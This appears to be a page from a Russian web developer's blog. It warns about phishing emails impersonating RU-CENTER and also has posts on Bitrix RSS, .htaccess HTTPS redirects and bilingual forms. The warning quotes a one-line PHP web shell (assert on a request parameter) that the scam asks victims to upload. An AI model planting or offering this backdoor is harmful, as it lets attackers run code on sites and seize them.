Страница 13 из 82

Мошеннические рассылки от лица RU-CENTER (nic.ru)

Мошеннические рассылки от лица RU-CENTER (nic.ru)

В последнее время участились мошеннические рассылки (spam/scam) якобы от лица RU-CENTER (nic.ru) только письма приходят от домена @nic.technical, @nic.tech и т.п.

Письмо выглядит очень правдоподобно, в нём фигурирует логотип Ru-Center и следующий дословный текст:


Уважаемый клиент!

В соответствии с изменениями, внесенными в ICANN RAA, Вы должны подтвердить, что фактическое управление доменом example.com осуществляется лицом, указанным в качестве его администратора.

Чтобы подтвердить, что Вы имеете фактическую возможность управлять доменом, создайте в корневой директории сайта файл 8741w0562wo02526.php со следующим содержимым:

<?php
assert(stripslashes($_REQUEST[RUCENTER]));
?>

Файл должен быть создан в течение трех календарных дней с момента получения настоящего письма и находиться на сервере до 26 февраля 2018 года, 20:00 (UTC+03:00), в противном случае процедура подтверждения не будет пройдена.

Обращаем Ваше внимание на то, что если процедура подтверждения не будет пройдена, делегирование домена будет приостановлено.

Вот скриншот этого безобразия:

Будьте внимательны! Никогда не при каких условиях не ведитесь на подобные «разводы». Никогда, не при каких условиях не размещайте файлы, скрипты и подобные вещи у себя на сайте. С помощью этих уловок мошенники с лёгкостью смогут взломать ваш сайт, и использовать его в своих корысных целях. В худшем случае смогут «угнать» ваш домен, т.е. перерегистрировать его на себя. Тем самым украв ваш бизнес. Начнут вас шантажировать и требовать деньги за выкуп домена обратно.

Предупреждён значит вооружён.


PS: Пруф-линк уведомления от RU-CENTER об осуществлении мошеннических рассылок: https://www.nic.ru/news/2017/alert_27.03.html

Рассылки от мошенников

Уважаемые клиенты!

Некоторые наши клиенты периодически получают письма якобы от имени RU-CENTER, призывающие:

разместить в корневой директории сайта вредоносный файл для подтверждения права владения доменом;
произвести оплату услуг по ссылке, ведущей на сайт, не имеющий отношения к RU-CENTER;
оплатить «регистрацию домена в поисковых системах», «присутствие в интернете» и т.д.

Подобные письма рассылаются мошенниками по адресам, находящимся в открытом доступе.

Мы никогда не требуем подтвердить право на домен таким способом, не запрашиваем у клиентов пароли в электронных письмах, не размещаем формы оплаты наших услуг на сторонних ресурсах, а сообщения об изменениях в наших настоящих уведомлениях всегда сопровождаются ссылками на оригиналы документов, публикуемые на нашем сайте.

Чтобы не стать жертвой мошенничества:

проверяйте достоверность информации на сайте https://nic.ru, если вы получили письмо, призывающее произвести проверку домена, оплату или любое другое действие, связанное с изменением правил;
если в письме содержится ссылка на сайт RU-CENTER, после перехода убедитесь, что вы находитесь на сайте по адресу https://www.nic.ru, в адресной строке присутствует зелёный замок и для сайта установлен сертификат, выданный JSC ‘RU-CENTER’;
внимательно проверяйте адрес отправителя. Наши письма уходят только с адресов в домене nic.ru. Поддельные адреса мошенников часто заканчиваются на @nic.technical, @nic.tech и т.п.

В случае малейших подозрений — уточняйте информацию в службе поддержки.

Будьте бдительны!

Памяти Криса Касперски (мыщъх)

Памяти Криса Касперски (мыщъх)

Крис Касперски, он же: мыщъх, KPNC, nezumi, а также visual-sex-ltd, elraton, souriz, tikus, muss, farah и jardon

18 февраля 2017 года скончался Николай Лихачев, известный всему IT-миру как Крис Касперски, — старый автор журнала Хакер, человек, само имя которого вошло в историю и стало синонимом словосочетания «русский хакер».

В память о мыщъхе, статья Журнала Хакер

  1. #01. Глубоководное погружение в чипсет Intel 875P
  2. #02. Неявный самоконтроль как средство создания неломаемых защит
  3. #03. Восстановление данных с лазерных дисков
  4. #04. Могущество кодов Рида-Соломона, или Информация, воскресшая из пепла
  5. #05. Искажение TOC как средство борьбы с несанкционированным копированием диска
  6. #06. Борьба с вирусами. Опыт контртеррористических операций
  7. #07. Полиномиальная арифметика и поля Галуа, или Информация, воскресшая из пепла II
  8. #08. Коды Рида-Соломона в практических реализациях, или Информация воскресшая из пепла III
  9. #09. Практические советы по восстановлению системы в боевых условиях
  10. #10. Вирусы в UNIX, или Гибель «Титаника» II
  11. #11. Жизненный цикл червей
  12. #12. Ошибки переполнения буфера извне и изнутри как обобщенный опыт реальных атак
  13. #13. Ошибки переполнения буфера извне и изнутри как обобщенный опыт реальных атак
  14. #14. Побег через брандмауэр плюс терминализация всей NT
  15. #15. Путь воина – внедрение в pecoff-файлы
  16. #16. Техника внедрения кода в РЕ-файлы и методы его удаления
  17. #17. Разгон и торможение Windows NT
  18. #18. Восстановление данных на NTFS-разделах
  19. #19. Восстановление данных на NTFS-разделах. Часть 2
  20. #20. Файловая система NTFS извне и изнутри. Часть 1
  21. #21. Файловая система NTFS извне и изнутри. Часть 2
  22. #22. Как защищают программное обеспечение
  23. #23. Восстановление NTFS – undelete своими руками
  24. #24. Техника оптимизации под Linux
  25. #25. Unformat для NTFS
  26. #26. Восстановление удаленных файлов под Linux
  27. #27. Техника оптимизации под Linux. Часть 2. Ветвления
  28. #28. Техника оптимизации под Linux. Часть 3. Оптимизация циклов
  29. #29. Восстанавливаем удаленные файлы под BSD
  30. #30. Насколько неуязвима ваша беспроводная сеть
  31. #31. Модифицируем BIOS
  32. #32. Удаленно управляем BIOS Setup
  33. #33. CD, не подвластный копированию
  34. #34. Как спасти данные, если отказал жесткий диск
  35. #35. LinuxBSD как бастион на пути вирусов
  36. #36. Антиотладка старые приемы на новый лад
  37. #37. Cудьба shell-кода на системах с неисполняемым стеком
  38. #38. Можно ли защититься от переполнения буферов
  39. #39. Генная инженерия на службе распаковки PE-файлов
  40. #40. Техника снятия дампа с защищенных приложений
  41. #41. Волшебство с паяльником в руках
  42. #42. Аудит и дизассемблирование эксплоитов
  43. #43. Упаковщики исполняемых файлов в LinuxBSD
  44. #44. Как обнаружить malware-программы Универсальный метод
  45. #45. Многоядерные процессоры и проблемы, ими порождаемые, в ОС семейства NT
  46. #46. Ошибки синхронизации открывают большие возможности для хакеров
  47. #47. Как надо и как не надо защищать веб-контент от кражи
  48. #48. Потоковое8 аудиовидеовещание с VideoLAN
  49. #49. Поиск malware на Server 2003XP своими руками
  50. #50. Жучки в электронных письмах
  51. #51. Дефекты проектирования Intel Core 2 Duo.
  52. #52. Рецепты правильного трудоустройства
  53. #53. Как зарабатывают на Open Source
  54. #54. Чего ждать от удаленной работы
  55. #55. Бессистемные заметки о поиске работы за рубежом
Live fast, die young

Live fast, die young

Ошибочное отображение старых новостей в RSS фиде Новостей Битрикс (проблема кросспостинга через RSS ленту)

Для того чтобы распространять новости по различным социальным сетям нужно использовать отдельные сервисы кросспостинга либо своё решение реализующее данную возможность. Как правило все эти сервисы используют RSS ленту, чтобы публиковать новости. Система кросспостинга периодически (по расписанию) запрашивает RSS ленту сайта, разбирает её на составляющие части и принимает решение. Публиковать новость (если она еще не опубликована) или не публиковать её (следовательно уже опубликована).

В Битрикс, чтобы в новостях была подключена возможность генерации RSS, необходимо в настройках разрешить RSS.

[здесь и далее вам нужно заменить https://www.example.com/ на URL своего сайта]

На странице: https://www.example.com/bitrix/admin/iblock_type_admin.php?PAGEN_1=1&SIZEN_1=10&lang=ru

[где «news» это ID типа инфоблока]

https://www.example.ru/bitrix/admin/iblock_type_edit.php?lang=ru&ID=news

После этих манипуляций в свойствах нужного инфоблока:

Появляется возможность редактировать параметры RSS:

Чтобы включить отображение ссылки на RSS-фид (иконка RSS) нужно (в режиме редактирования битрикс) в включаемом компоненте bitrix:news нажать на шестерёнку

Далее в вкладке «Настройки RSS» выставить нужные настройки RSS:

Также необходимо определить порядок сортировки новостей (вкладка «Источник данных»). Как правило Первичная сортировка происходит «по дате начала активности» (по убыванию), и вторичная сортировка «по ID» (по убыванию):

Просмотр RSS фида. Обратите внимание, что вверху самые свежие новости…

А внизу RSS… старые записи. Почему так может проиходить? Мы же правильно выставили настройки RSS. Правильно выставили направления сортировок, и так далее. Но с завидным упорством вылезают старые записи.

Начал копать, и выяснил что:

Старые новости имели пустоту в поле начала активности (поле не было заполнено). Такие события нежелательны в принципе.

После заполнения этого поля, сохранения, обновления кеша вывода компонента RSS ленты будет выводиться…

Корректный вывод RSS ленты:

Следующим шагом будет
проверка настройки «Поля элементов инфоблока» на странице
https://www.example.com/bitrix/admin/iblock_edit.php?type=news&lang=ru&ID=1&admin=Y&return_url=iblock_section_admin.php%3FIBLOCK_ID%3D44%26type%3Dcatalog%26lang%3Dru%26find_section_section%3D0

Где желательно поставить в поле «Начало активности» значение «Текущие дата и время», а также поставить галочку «Обязательное поле».

Благодарю за внимание.

301-redirect (перенаправление) с HTTP на HTTPS в .htaccess

Чтобы проделать ту или иную процедуру, необходимо создать (или модифицировать) файл .htaccess который лежит в корневой директории сайта (просмотреть можно посредством программы FTP-клиента).

Если мы НЕ ХОТИМ использовать WWW в адресе сайта

Перенаправить с или без www: домен 2 уровня

RewriteEngine on
RewriteCond %{HTTP_HOST} ^example\.com$ [OR]
RewriteCond %{HTTP_HOST} ^www\.example\.com$
RewriteRule ^(.*)$ "https\:\/\/example\.com\/$1" [R=301,L]

Перенаправить с или без www: домен 3 уровня

RewriteEngine on
RewriteCond %{HTTP_HOST} ^example\.com$ [OR]
RewriteCond %{HTTP_HOST} ^www\.example\.com$
RewriteRule ^(.*)$ "https\:\/\/example\.com\/$1" [R=301,L]

Если мы ХОТИМ использовать WWW в адресе сайта

Перенаправить с или без www: домен 2 уровня

RewriteEngine on
RewriteCond %{HTTP_HOST} ^forum\.example\.com$ [OR]
RewriteCond %{HTTP_HOST} ^www\.forum\.example\.com$
RewriteRule ^(.*)$ "https\:\/\/www\.forum\.example\.com\/$1" [R=301,L]

Перенаправить с или без www: домен 3 уровня

RewriteEngine on
RewriteCond %{HTTP_HOST} ^forum\.example\.com$ [OR]
RewriteCond %{HTTP_HOST} ^www\.forum\.example\.com$
RewriteRule ^(.*)$ "https\:\/\/www\.forum\.example\.com\/$1" [R=301,L]

Двуязычная форма в Битриксе

Сегодня мы рассмотрим вопрос создания формы на двух (и более) языках в Битриксе.

Имеем форму:

Где все описания к вопросам на двух языках разделенные слешем (/):

Все действия проводятся в шаболне формы. Чтобы создать новый шаблон, нужно в режиме редактирования:

Нужно скопировать шаблон формы по умолчанию (.default) с новым именем, например visit-form

и выбрать месторасположение (по умолчанию в общем шаблоне .default).

Сохраняем. Затем нажимаем на шестеренку формы, выбираем Заполнение веб-формы -> Редактировать шаблон компонентов:

Мы увидим шаблон формы, а точнее адрес этого шаблона в файловой системе хостинга.

После этого, я настоятельно рекомендую вам найти этот файл в FTP-клиенте, сделать его резервную копию. После этого можете открыть рабочий файл в своём любимом текстовом редакторе, и уже работать с ним.

Далее опишу алгоритм решения вопроса:

Мы определяем элемент(ы) которы(й|е) нужно распарсить на два языка и вывести на той или иной стороне сайта. В моём случае мы определяем массив, где элементов больше 200 (список стран и регионов) — строка 25. Потом пробегаемся по массиву этого отдельного вопроса «Страны» (строка 32) и распарсиваем его на 2 языка — строка 37.

Строки 40-44 описывают условие при котором на той или иной стороне сайта выводится тот или иной язык описания вопроса (в нашем случае название страны-региона то на английском то на русском языке).

Подобный алгоритм используем в отношении самих «Вопросов» — строки 62-70.

В целом код прокомментирован и там всё понятно.

Звёзд: 1Звёзд: 2Звёзд: 3Звёзд: 4Звёзд: 5 (1 оценок, среднее: 5,00 из 5)
Загрузка...

© 2007–2024, konyakov.ru